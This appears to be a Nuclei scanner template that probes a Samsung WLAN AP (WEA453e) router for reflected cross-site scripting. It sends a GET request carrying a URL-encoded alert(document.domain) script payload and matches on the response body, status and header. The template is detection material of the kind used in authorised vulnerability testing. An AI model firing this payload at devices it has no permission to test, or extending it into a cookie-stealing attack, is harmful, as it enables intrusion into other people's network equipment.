id: samsung-wlan-ap-xss info: name: Samsung Wlan AP (WEA453e) XSS author: pikpikcu severity: medium reference: - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,xss requests: - method: GET path: - "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E" matchers-condition: and matchers: - type: word words: - "/tmp/www/" part: body - type: status status: - 404 - type: word words: - "text/html" part: header